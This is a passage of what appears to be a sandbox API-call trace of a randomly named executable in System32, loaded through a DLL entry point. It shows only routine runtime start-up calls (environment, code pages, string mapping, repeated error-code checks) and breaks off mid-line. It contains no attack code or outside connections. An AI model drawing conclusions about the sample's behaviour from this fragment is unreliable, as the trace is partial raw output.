/dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"%Temp%\\IXP000.TMP\\\"" [0037.001] GetEnvironmentStringsW () returned 0x4a7908* [0037.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0037.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13609f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0037.001] FreeEnvironmentStringsW (penv=0x4a7908) returned 1 [0037.001] GetStartupInfoA (in: lpStartupInfo=0x2af8ac | out: lpStartupInfo=0x2af8ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0037.001] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0037.001] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0037.001] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0037.001] SetHandleCount (uNumber=0x20) returned 0x20 [0037.001] GetLastError () returned 0x0 [0037.001] SetLastError (dwErrCode=0x0) [0037.001] GetLastError () returned 0x0 [0037.001] SetLastError (dwErrCode=0x0) [0037.001] GetLastError () returned 0x0 [0037.002] SetLastError (dwErrCode=0x0) [0037.002] GetACP () returned 0x4e4 [0037.002] GetLastError () returned 0x0 [0037.002] SetLastError (dwErrCode=0x0) [0037.002] IsValidCodePage (CodePage=0x4e4) returned 1 [0037.002] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af88c | out: lpCPInfo=0x2af88c) returned 1 [0037.002] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af358 | out: lpCPInfo=0x2af358) returned 1 [0037.002] GetLastError () returned 0x0 [0037.002] SetLastError (dwErrCode=0x0) [0037.002] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2af2e8 | out: lpCharType=0x2af2e8) returned 1 [0037.002] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af76c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.002] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af76c, cbMultiByte=256, lpWideCharStr=0x2af0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0037.002] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x2af36c | out: lpCharType=0x2af36c) returned 1 [0037.002] GetLastError () returned 0x0 [0037.002] SetLastError (dwErrCode=0x0) [0037.020] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0037.020] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af76c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.020] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af76c, cbMultiByte=256, lpWideCharStr=0x2af0a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.020] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0037.020] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2aee98, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.020] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2af66c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ»\x80òõ¤ø*", lpUsedDefaultChar=0x0) returned 256 [0037.020] GetLastError () returned 0x0 [0037.021] SetLastError (dwErrCode=0x0) [0037.021] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af76c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0037.021] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af76c, cbMultiByte=256, lpWideCharStr=0x2af0c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0037.021] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0037.021] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2aeeb8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0037.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2af56c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ»\x80òõ¤ø*", lpUsedDefaultChar=0x0) returned 256 [0037.021] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0037.021] GetLastError () returned 0x0 [0037.021] SetLastError (dwErrCode=0x0) [0037.021] GetLastError () returned 0x0 [0037.021] SetLastError (dwErrCode=0x0) [0037.021] GetLastError () returned 0x0 [0037.021] SetLastError (dwErrCode=0x0) [0037.021] GetLastError () returned 0x0 [0037.021] SetLastError (dwErrCode=0x0) [0037.021] GetLastError () returned 0x0 [0037.021] SetLastError (dwErrCode=0x0) [0037.021] GetLastError () returned 0x0 [0037.021] SetLastError (dwErrCode=0x0) [0037.021] GetLastError () returned 0x0 [0037.021] SetLastError (dwErrCode=0x0) [0037.021] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.022] SetLastError (dwErrCode=0x0) [0037.022] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.023] SetLastError (dwErrCode=0x0) [0037.023] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.024] GetLastError () returned 0x0 [0037.024] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.025] SetLastError (dwErrCode=0x0) [0037.025] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.026] SetLastError (dwErrCode=0x0) [0037.026] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.027] SetLastError (dwErrCode=0x0) [0037.027] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.028] SetLastError (dwErrCode=0x0) [0037.028] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.029] SetLastError (dwErrCode=0x0) [0037.029] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () returned 0x0 [0037.030] SetLastError (dwErrCode=0x0) [0037.030] GetLastError () 